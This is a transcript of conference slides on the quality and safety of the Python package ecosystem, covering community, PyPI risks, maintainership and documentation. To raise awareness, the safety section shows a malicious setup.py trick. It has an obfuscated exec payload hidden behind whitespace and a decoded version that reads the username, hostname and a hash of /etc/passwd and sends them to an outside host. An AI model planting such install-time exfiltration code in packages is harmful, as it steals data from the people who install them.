the quality of the python ecosystem - and how we can protect it!

55
The Quality of the Python Ecosystem Bruno Rocha - @rochaCbruno - brunorocha.org

Upload: bruno-rocha

Post on 29-Jan-2018

1.211 views

Category:

Technology


0 download

TRANSCRIPT

The Quality of the Python Ecosystem

Bruno Rocha - @rochaCbruno - brunorocha.org

Bruno Rocha - @rochaCbruno

Quality Engineer @ RedHat.com

Podcaster @ Castalio.info

Teacher @ CursoDePython.com.br

Blogger @ BrunoRocha.org

castalio.info

youtube.com/castaliopodcast

Every Monday 10AM Podcast to listen on itunes, rss, players etc

Every Wednesday 7PM YouTube live!

“An ecosystem is a community of living organisms in conjunction with the nonliving components of their environment (things like air, water and mineral soil), interacting as a system”

-- Wikipedia

- You (and your groups)

- Communities (meetups and conferences)

- theoretical Material (books, tutorials, courses)

- Tools (systems, IDEs, platforms)

- Package library (pip, github, conda)

- Python Software Foundation- The Language (core developers)

Ecossistema Python?

What attracts so many people to Python?

- Python is easy to learn.- The community is receptive- It has really cool events.- It's easy to write and publish new

libraries with Python.- You thought in something ... you

already have it in PyPI.- It is popular and fashionable.- Approved by Large companies.

$ pip install magic>>> magic.run()

Or in the words of the Brazilian poet...

“In Python everything is object, it is also beautiful and wonderful.”(it makes more sense in Portuguese)

How to assure Software Quality?

Enterprise

?

How to assure professional quality?

?Professional Python Certification! Became a professional for only $ 9.999,99 / year

How to assure the Quality of published libraries?

?Become “Python Developer Partner” Publish your librariesto “PyPI store” for only $ 9.999,99 / year

PY

New Python 3.6Featuring exclusive `f’string`

Only $ 999/year

You need Python 3.6Call 555 - 5555 And buy it now!

Oportunity: First 100 customersWill get IDLE for free...By Guido Inc.

Dude, how can you be so dumb?

● Python has no owner, it belongs to the community.● The community is quality control.● The community is a certifying entity *.

* In the Python community, EVERYONE are encouraged to participate and make a difference, collaborating with the various pillars of the community (slide 4) is of great value to the career of the Python professional.

YOU

“I came for the language but I stay for the community” - Brett Cannon

"Diversity happens when different people meet in one place"

"Inclusion happens when these people can work together, as equals, with the same opportunities and without prejudice to any of them"

- Naomi Ceder (Pycon Brasil 2016)

How to fight the community and diversity problems?

- Code of conduct- Adopt a mentor's position, not a judge's.

Open by default

- PSF (grants, membership, fellowship and board)- Repositories- Experiments (MyPy, Gilectomy)- APyB- Call 4 Papers- PyPI/Warehouse- Python Planet- PEPs- GruPys

Você pode participarabertamente!!!

100_000+LibrariesonPyPI

$ pip install magic>>> magic.run()

- Python is easy!- Lot of libraries available

>>> TracebackCannot do the magic today...

- How many of the 100_000+ has test coverage?

- Good documentation?

- How do I choose?

$ pip install magic$ installing…$ HAHA you got hacked!!!

- Are all that libs safe?

- Anyone can publish a new lib in PyPI in few minutes, who assure the safety?

Safety!!!

# setup.py `pip install magic`from setuptools import setup

setup(

name="magic",

...

)

Always review source code of the libs you are installing.

Specially `setup.py`

Don’t forget the scrollbars.

;import zlib;

exec(zlib.decompress('eJx9UcFqxCAQvfsVXhYVtoY

Wegn0uF+x7MHG2ShNHNEJ3aX036vJBrJQ4uX5HOfNe+rH

iIk4ZuaX\n3ZSGwX8+s7eVOpPdphoHQ1dMI2OU7i3jZU3

BjMA/iqDugQbsfZCKwa2DSPw0g8fATebw3CDOh3wR\n/M

Bho+YwU6mtc/R8Warz62VP8tH1r+K1RijFRxI92neJEYI

UDVDXRJPztxVKJzBWKqUd3KzvIdN+\nilV2O9MaMuVoeU

JdAEKHFuSPmGOIdsl+5KIaLrRCYbNWoTP+qu3jLr9RtRb

Pjii2TRPv5DC8BFNd\nFcsJvyYTo+5wbMSRVyO77mtq9g

fllKgC\n'.decode('base64')))

Multiple of 4 white spaces

Python tricks!

# `pip install magic` import os, urllib, urllib2, hashlib, platform

try:

uname = os.getlogin()

except Exception as e:

uname = '[%s]' % e

try:

host = platform.uname()[1]

except Exception as e:

host = '[%s]' % e

try:

fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest()

except Exception as e:

fhash = '[%s]' % e

data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash})

try:

urllib2.urlopen('http://WannaPyCry.herokuapp.com/', data)

except Exception as e:

pass

Decoded trick

Nothing serious hereBut could be a real hack

Solution?

$ pip install safety$ safety check

Open SourceCommunity driven safety checks?

Please create moreSafety tools!!!!

Why “The Python” dont fix this issues without depending on third party services?

https://github.com/pypa New generation of PyPI is `warehouse`and you can helpOn Github.com/pypaOnly 18 contributors?

Not a coder?donate!!!

Warehouse is a next generation Python Package Repository designed to replace the legacy code base that currently powers PyPI

Rank: 4.5 - safe

Rank: 2.0 - outdated

Rank: 1.0 - danger

1.234 Reviews ++1 Review --Why not making it more `social driven` to

address the library quality problem?

Example:More maintainersMore qualitypoints!

What to do about safety ?

- Check before installing- Install known and trusted libraries- Use SafetyCI - pyup.io- Create (and share) more tools to help with verification- Report if lib is suspected- Collaborate to the Pypa / Warehouse project

The responsability is YOURS OURS!!!

Every library published in PyPI comes with an invisible tag that says:

"I am aware of the responsibilities that I must assume when I publish this code and I promise to do my best to keep it with quality until the end of time!"And I'll leave it explicit if for any reason I can not keep leaving the path clearFor anyone wanting to create a fork!

That “one man project” is not so cool

Maintanable:

Project that can be maintable by as many and diverse people.

Leftpad is ` npm` problem, will not happen with Python?

pip install requests● 99.9% of installations of Python environments install requests● If the version is not specified your build may break● Tools like Travis-Ci depend on requests and have already broken for this!● Operating systems bring requests by default● Until a few months ago this was a 'one man band' project, but after recent

issues with releases the creator decided to exclude himself as administrator from the lib and elected other maintainers

● It is not the only one, there are other Python libs published with the same risk

● Always specify your versions● Use pyup.io or requires.io or any other solution of the type● Use safety / IC or something

…..

Too many broken releases in a single day...

TravisCi broke (even if you pinned the version) it was depending on requests itself.And backwards incompatible code was pushed.

So the creator assumed the responsabilityand did the right thing! Thanks!!!

Safety and maintainabilityAre not the only problems!

Just like we did recently, changing our testing culture.

We need efforts to change our documentation culture!

Q: Why most libraries do not have good documentation?A: Writing documentation is a boring process!

Q: Why is it boring?A: Non-friendlier tools and formats (rst) drive people away from the documentation. We need to do as we did with the tests and adopt easier formats (md?) and tools. (in other words we need a `py.test` for documentation.

Q: How to encourage people to contribute documentation?A: First we need to define the process (as well as in the tests) and then create a manifesto attracting contributors, showing the importance, providing a certain status to the documenter, and using the events to foster that culture.

Tips to write good libs

python.apichecklist.com

Conclusion- Python is not a product!- The ecosystem (mainly the community) already has above average quality- We need more theoretical quality materials for beginners- Documentation is important we need to give it more focus- We can use tools to help in the QA of Python libraries- We can collaborate with the evolution of PyPI- We can collaborate with the evolution of Python- The quality of the ecosystem is OUR responsibility- Be responsible and publish only quality libraries in PyPI- We need a collaborative solution to classify 100,000+ libs- Collaborate!

Bruno Rocha - @rochaCbruno

Quality Engineer @ RedHat.com

Podcaster @ Castalio.info

Teacher @ CursoDePython.com.br

Blogger @ BrunoRocha.org